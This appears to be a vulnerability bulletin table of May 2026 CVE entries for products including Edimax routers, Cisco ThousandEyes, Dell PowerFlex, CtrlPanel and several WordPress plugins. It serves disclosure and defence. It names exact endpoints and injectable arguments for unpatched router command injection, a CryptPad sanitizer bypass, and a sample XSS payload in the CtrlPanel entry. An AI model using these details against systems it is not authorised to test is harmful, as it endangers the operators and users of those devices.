| calcom–cal.diy | A vulnerability was determined in calcom cal.diy up to 4.9.4. Affected by this issue is the function getServerSideProps of the file apps/web/modules/bookings/views/bookings-single-view.getServerSideProps.tsx of the component Generic React API. This manipulation of the argument cancelledBy/rescheduledBy causes information disclosure. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9349 | VDB-365312 | calcom cal.diy Generic React API bookings-single-view.getServerSideProps.tsx getServerSideProps information disclosure VDB-365312 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812177 | cal.com <= v4.9.4 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/b59c44d1550c4b0f373ca4eb1c150994 |
| calcom–cal.diy | A vulnerability was identified in calcom cal.diy up to 4.9.4. Impacted is an unknown function. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 4.3 | CVE-2026-9303 | VDB-365250 | calcom cal.diy cross-site request forgery VDB-365250 | CTI Indicators (IOB, IOC) Submit #812173 | cal.com <= v4.9.4 Cross-Site Request Forgery (CWE-352) Submit #812175 | cal.com <= v4.9.4 Cross-Site Request Forgery (CWE-352) (Duplicate) https://gist.github.com/YLChen-007/26663d9558e15994176dc420d2e11d48 https://gist.github.com/YLChen-007/dafada36e356bc895b09829d8ec57e49 |
| Cisco–Cisco NX-OS Software | A vulnerability in the Border Gateway Protocol (BGP) enforce-first-as feature of Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to trigger BGP peer flaps, resulting in a denial of service (DoS) condition. This vulnerability is due to incorrect parsing of a transitive BGP attribute. An attacker could exploit this vulnerability by sending a crafted BGP update through an established BGP peer session. If the update propagates to an affected device, it could cause the device to drop the BGP session and flap with the BGP peer that is forwarding this update, resulting in a DoS condition. | 2026-05-20 | 6.8 | CVE-2026-20171 | cisco-sa-bgp-iefab-3hb2pwtx |
| Cisco–Cisco ThousandEyes Enterprise Agent | A vulnerability in the BrowserBot component of Cisco ThousandEyes Enterprise Agent could have allowed an authenticated, remote attacker to execute arbitrary commands on Agents on behalf of the BrowserBot synthetics orchestration process. Cisco has addressed this vulnerability in the Cisco ThousandEyes Enterprise Agent, and no customer action is needed. This vulnerability was due to insufficient input validation of command arguments that are supplied by the user. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by authenticating to the ThousandEyes SaaS and submitting crafted input into the affected parameter. A successful exploit could have allowed the attacker to execute arbitrary commands within the BrowserBot container as the node user. To exploit this vulnerability, the attacker must have valid user credentials for the ThousandEyes SaaS and the ability to manage transaction tests. | 2026-05-20 | 6.3 | CVE-2026-20206 | cisco-sa-tebbot-cmdinj-wN3yQ5gn |
| Cisco–Cisco ThousandEyes Enterprise Agent | A vulnerability in the SSL certificate handling of Cisco ThousandEyes Virtual Appliance could allow an authenticated, remote attacker to execute commands on the underlying operating system as the root user. This vulnerability is due to insufficient validation of user-supplied input. An authenticated attacker could exploit this vulnerability by uploading a crafted certificate to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-05-20 | 4.7 | CVE-2026-20199 | cisco-sa-tevacert-rce-RMJVEym5 |
| conoha–TypeSquare Webfonts for ConoHa | The TypeSquare Webfonts for ConoHa plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin’s site-wide font settings, including the typesquare_auth option (fontThemeUseType), show_post_form, and typesquare_fonttheme, by submitting a POST request to any wp-admin page. For fontThemeUseType values 1 and 3, no nonce verification is performed either, meaning those branches are additionally exploitable via cross-site request forgery. | 2026-05-20 | 4.3 | CVE-2026-8610 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88002a25-6890-4f8b-8a11-239b59d56672?source=cve https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L93 https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/inc/class/class.auth.php#L51 https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L25 |
| cryptpad–cryptpad | CryptPad is an end-to-end encrypted collaborative office suite. In versions prior to 2026.2.0, the HTML sanitizer in Diffmarked.js can be bypassed due to incomplete attribute filtering on restricted tags. The sanitizer validates only the src attribute of <iframe>, <video>, and <audio> elements, leaving all other attributes unchecked. As a result, an attacker can inject arbitrary HTML through srcdoc, completely defeating CryptPad’s intended bounce sandboxing and enabling link injection or other interactive content within user-controlled documents. The root cause lies in how the sanitizer classifies and enforces tag restrictions: although it defines both forbidden and restricted tag lists, <iframe> is treated as “restricted” rather than “forbidden.” Enforcement then inspects only the src attribute, so pairing a benign blob: src with a malicious srcdoc results in unrestricted rendering. This issue has been fixed in version 2026.2.0. | 2026-05-20 | 6.1 | CVE-2026-26028 | https://github.com/cryptpad/cryptpad/security/advisories/GHSA-g2g4-47gv-p72v https://github.com/cryptpad/cryptpad/releases/tag/2026.2.0 |
| Ctrlpanel-gg–panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the admin settings update endpoint accepted a fully qualified class name directly from user-supplied request input and used it for dynamic static method calls and object instantiation without any allowlist validation, allowing for authenticated Remote Code Execution. An authenticated admin-level user could supply an arbitrary class name available in the Composer autoloader, potentially triggering unintended constructor or magic method execution. The update() method reads settings_class directly from the HTTP request and passed it to new $settings_class() and $settings_class::getValidations() without verifying that the provided value corresponds to a legitimate settings class: Because PHP resolves class names against the Composer autoloader at runtime, any autoloadable class in the application or its dependencies could be instantiated. Depending on the classes available in the dependency tree, this can trigger unintended side effects through constructors or magic methods (__construct, __toString, __wakeup), following a PHP object injection / gadget chain pattern. This issue has been fixed in version 1.2.0. | 2026-05-19 | 6.6 | CVE-2026-34216 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-vcg3-fjrx-rg5q https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| Ctrlpanel-gg–panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multiple admin controllers expose DataTable endpoints without authorization checks, allowing any authenticated user to access sensitive administrative data that should be restricted to administrators only. The affected admin controllers define datatable() methods that are reachable via GET requests but lack any permission or role verification. Because the routes fall under the /admin/ prefix, operators may assume they are protected – however, the middleware applied to this route group does not enforce admin-level authorization on these specific endpoints. As a result, any authenticated user (regardless of role) can query these endpoints and receive paginated JSON responses containing sensitive records. Exploitation can result in enumeration of user PII, payment and transaction records, active voucher and coupon codes, role and permission structure, server ownership mappings and support ticket contents. This issue has been fixed in version 1.2.0. | 2026-05-19 | 6.5 | CVE-2026-34233 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-mj5g-j7fq-7hc4 https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| Ctrlpanel-gg–panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability exists in the admin role management interface. In app/Http/Controllers/Admin/RoleController.php, the datatable() method interpolates $role->name and $role->color directly into a <span> element’s HTML and style attribute without sanitization, and the chained .rawColumns([‘actions’, ‘name’]) call instructs DataTables to render the name column as raw HTML, bypassing automatic output escaping. An admin with role creation or edit permissions can inject a payload such as <img src=x onerror=”alert(‘XSS_POC’)”> into the name or color fields, which is persisted to the database and executes in the browser of every admin who loads the /admin/roles page. This enables session hijacking via cookie theft, credential harvesting through fake login prompts or keyloggers, lateral privilege escalation by performing admin actions on behalf of victims, and a persistent backdoor that re-executes on every page load until the malicious role record is removed. This issue has been resolved in version 1.2.0. | 2026-05-19 | 4.8 | CVE-2026-34246 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-wpqj-xwhq-2mmh https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| cvmh–Sticky | The Sticky plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `cvmh-sticky` shortcode `readmoretext` attribute in versions up to and including 2.5.6. This is due to insufficient input sanitization and output escaping in the `cvmh_sticky_front_render()` function – the `readmoretext` attribute value is passed through `apply_filters()` and directly concatenated into the HTML output without any escaping function such as `esc_html()`. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a page containing the injected shortcode. | 2026-05-20 | 6.4 | CVE-2026-6397 | https://www.wordfence.com/threat-intel/vulnerabilities/id/135783c5-8175-4775-a013-f1e2bef04479?source=cve https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/functions.php#L118 https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/functions.php#L118 https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/shortcode.php#L7 https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/shortcode.php#L7 |
| dartiss–Draft List | The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Draft Post Title in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The unescaped injection path is triggered specifically when the viewing user lacks edit capabilities, meaning payloads embedded in draft post titles via attribute-breakout techniques execute for unauthenticated users and subscribers. | 2026-05-22 | 6.4 | CVE-2026-9104 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07361278-7abb-4d22-a8df-218d3f982483?source=cve https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L396 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L305 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L66 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L389 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L391 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L394 |
| Dell–ECS | Dell ECS, versions 3.5 and 3.6, contain an Improper Access Control in the Identity and Access Management (IAM) module. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to gaining read access to unauthorized data. | 2026-05-22 | 5.9 | CVE-2022-31231 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P0000004RFTQA2/view |
| Dell–Live Optics | Dell Live Optics Windows and Personal Edition collectors contain an improper certificate validation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability leading to loss of confidentiality and integrity. | 2026-05-18 | 6.8 | CVE-2026-41119 | https://www.dell.com/support/kbdoc/en-us/000464862/dsa-2026-221-security-update-for-dell-live-optics-collector-ssl-vulnerability |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and prior, contains an Open Redirect Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability, leading to a targeted application user being redirected to arbitrary web URLs. The vulnerability could be leveraged by attackers to conduct phishing attacks that cause users to divulge sensitive information. | 2026-05-22 | 6.1 | CVE-2025-26483 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-05-22 | 5.3 | CVE-2025-32747 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. | 2026-05-22 | 5.3 | CVE-2025-32749 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Insecure Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. | 2026-05-22 | 5.5 | CVE-2025-32751 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Improper Certificate Validation vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Information tampering. | 2026-05-22 | 4.2 | CVE-2025-32745 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Insecure Storage of Sensitive Information vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. | 2026-05-22 | 4 | CVE-2025-32746 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell–SmartFabric Storage Software | Dell SmartFabric Storage Software, versions prior to 1.4.5, contains an Improper Neutralization of Special Elements used in a Command (‘Command Injection’) vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Filesystem access for attacker. | 2026-05-20 | 6.4 | CVE-2026-35070 | https://www.dell.com/support/kbdoc/en-us/000466942/dsa-2026-235-security-update-for-dell-networking-smartfabric-storage-software-vulnerabilities |
| Dell–Unisphere for PowerMax | Dell Unisphere for PowerMax vApp version prior to 10.0.0.2, contains an authorization bypass vulnerability in the Unisphere for VMAX application running in vApp | 2026-05-22 | 6.5 | CVE-2022-34363 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P000000xAiKQAU/view |
| Dell–VxRail | Dell VxRail versions before 7.0.200 contain a Plain-text Password Storage Vulnerability in VxRail Manager. A sys-admin user may exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. | 2026-05-22 | 6.7 | CVE-2021-21508 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka0Do000000m7VwIAI/view |
| discourse–discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, outdated cached AI summaries can leak removed content to anonymous and unprivileged users who cannot regenerate summaries. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. To work around this issue, restrict summary generation by tightening the allowed groups on the summarization Personas. | 2026-05-19 | 5.3 | CVE-2026-32244 | https://github.com/discourse/discourse/security/advisories/GHSA-hjmg-2mww-vfvx |
| DumbWareio–DumbAssets | DumbAssets through 1.0.11 contains a stored cross-site scripting vulnerability in asset fields including name, description, modelNumber, serialNumber, and tags that are stored without server-side sanitization and rendered using innerHTML without client-side escaping. Attackers can create or update assets with HTML or JavaScript payloads via the asset API endpoints to execute arbitrary scripts in the browsers of users viewing the asset list, and with Content-Security-Policy disabled, the injected scripts can make unrestricted connections to internal network services. | 2026-05-18 | 6.1 | CVE-2026-45231 | https://github.com/DumbWareio/DumbAssets/pull/135 https://www.vulncheck.com/advisories/dumbassets-stored-cross-site-scripting-via-asset-fields |
| eazyserver–Sentence To SEO (keywords, description and tags) | The Sentence To SEO (keywords, description and tags) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the create_admin_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-6391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/add32c06-90d0-466f-b176-aaae55cf03fb?source=cve https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L75 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L75 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L81 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L81 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L87 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L87 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L50 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L50 |
| Edimax–BR-6228NC | A vulnerability was detected in Edimax BR-6228NC 1.22. Affected by this issue is the function mp of the file /goform/mp of the component POST Request Handler. The manipulation of the argument command results in command injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8774 | VDB-364399 | Edimax BR-6228NC POST Request mp command injection VDB-364399 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811529 | EDIMAX BR6228NC BR-6228NCv2 (Version : v1.22) Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR6228NC-mp-34b53a41781f80db8aaed24e43ea24b9?source=copy_link |
| Edimax–BR-6428NS | A vulnerability was found in Edimax BR-6428NS 1.10. This issue affects the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component POST Request Handler. Performing a manipulation of the argument stadrv_ssid results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8777 | VDB-364402 | Edimax BR-6428NS POST Request formStaDrvSetup command injection VDB-364402 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811532 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formStaDrvSetup-34b53a41781f80ca940cc467cd15dfc2?source=copy_link |
| Edimax–BR-6428NS | A weakness has been identified in Edimax BR-6428NS 1.10. This impacts the function system of the file /goform/formWlanM of the component POST Request Handler. Executing a manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P can lead to command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9296 | VDB-365243 | Edimax BR-6428NS POST Request formWlanM system command injection VDB-365243 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811535 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlanMP-34b53a41781f808fb207ce3f297db80b?source=copy_link |
| Edimax–BR-6428NS | A security vulnerability has been detected in Edimax BR-6428NS 1.10. Affected is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. The manipulation of the argument repeaterSSID leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9297 | VDB-365244 | Edimax BR-6428NS POST Request formWlbasic command injection VDB-365244 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811536 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlbasic-34b53a41781f807fb398dbab03bdbb38?source=copy_link |
| Edimax–BR-6675nD | A security flaw has been discovered in Edimax BR-6675nD 1.12. This affects the function formHwSet of the file /goform/formHwSet of the component POST Request Handler. The manipulation of the argument regDomain/ABandregDomain/nic0Addr/nic1Addr/wlanAddr/inicAddr results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9378 | VDB-365341 | Edimax BR-6675nD POST Request formHwSet command injection VDB-365341 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811555 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formHwSet-34b53a41781f8077b588f6e7cbbed36b?source=copy_link |
| Edimax–BR-6675nD | A weakness has been identified in Edimax BR-6675nD 1.12. This impacts the function formWpsStart of the file /goform/formWpsStart of the component POST Request Handler. This manipulation of the argument pinCode causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9379 | VDB-365342 | Edimax BR-6675nD POST Request formWpsStart command injection VDB-365342 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811556 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection Submit #811567 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection (Duplicate) https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWpsStart-34b53a41781f8011b77ac5ebb77dfddd?source=copy_link |
| Edimax–BR-6675nD | A flaw has been found in Edimax BR-6675nD 1.12. This issue affects the function formUSBStorage of the file /goform/formUSBStorage of the component POST Request Handler. Executing a manipulation of the argument sub_dir can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9400 | VDB-365381 | Edimax BR-6675nD POST Request formUSBStorage command injection VDB-365381 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811562 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formUSBStorage-34b53a41781f80809fc9e6ab3c51328b?source=copy_link |
| Edimax–BR-6675nD | A vulnerability was found in Edimax BR-6675nD 1.12. The affected element is the function formWlanMP of the file /goform/formWlanMP of the component POST Request Handler. The manipulation of the argument ateFunc/ateGain/ateRate/ateChan/ateTxCount/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/ateTxFreqOffset/ateMode/ateMacID/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/readE2P/e2pTxPwDeltaN results in command injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9402 | VDB-365383 | Edimax BR-6675nD POST Request formWlanMP command injection VDB-365383 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811565 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWlanMP-34b53a41781f8041aa2ecb4fa1927f59?source=copy_link |
| Edimax–EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn up to 1.31. The affected element is the function formWpsStart of the file /goform/formWpsStart of the component webs. This manipulation of the argument pinCode causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9343 | VDB-365306 | Edimax EW-7438RPn webs formWpsStart os command injection VDB-365306 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813884 | Edimax EW-7438RPn 1.31 Command Injection Submit #811551 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection (Duplicate) https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_1/1.md |
| Edimax–EW-7438RPn | A vulnerability has been found in Edimax EW-7438RPn up to 1.31. Affected is the function formWizSurvey of the file /goform/formWizSurvey of the component webs. The manipulation of the argument ip/mask/gateway leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9347 | VDB-365310 | Edimax EW-7438RPn webs formWizSurvey os command injection VDB-365310 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813889 | Edimax EW-7438RPn 1.31 Command Injection Submit #811543 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection (Duplicate) https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_5/5.md |
| Edimax–EW-7438RPn | A vulnerability was identified in Edimax EW-7438RPn 1.28a. Affected by this vulnerability is the function formHwSet of the file /goform/formHwSet of the component POST Request Handler. The manipulation of the argument Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/comd/initgain/txcck/txofdm leads to command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9359 | VDB-365322 | Edimax EW-7438RPn POST Request formHwSet command injection VDB-365322 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811540 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-EW-7438RPn-Mini-formHwSet-34b53a41781f80b98d10f0da699f2236?source=copy_link |
| Edimax–EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.12. This affects the function formAccept of the file /goform/formAccep of the component POST Request Handler. This manipulation of the argument submit-url causes command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9361 | VDB-365324 | Edimax EW-7438RPn POST Request formAccep formAccept command injection VDB-365324 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811552 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formAccept-34b53a41781f807fb8f3d96c5e5ef215?source=copy_link |
| Edimax–EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.12. This vulnerability affects the function formConnectionSetting of the file /goform/formConnectionSetting of the component Setting Handler. Such manipulation of the argument max_Conn/timeOut leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9362 | VDB-365325 | Edimax EW-7438RPn Setting formConnectionSetting command injection VDB-365325 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811553 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formConnectionSetting-34b53a41781f807a9c88e746d24540cd?source=copy_link |
| Edimax–EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.12. This issue affects the function formEZCHNwlanSetup of the file /goform/formEZCHNwlanSetu of the component POST Request Handler. Performing a manipulation of the argument method results in command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9363 | VDB-365326 | Edimax EW-7438RPn POST Request formEZCHNwlanSetu formEZCHNwlanSetup command injection VDB-365326 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811554 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formEZCHNwlanSetup-34b53a41781f803a8c60ca409394df5b?source=copy_link |
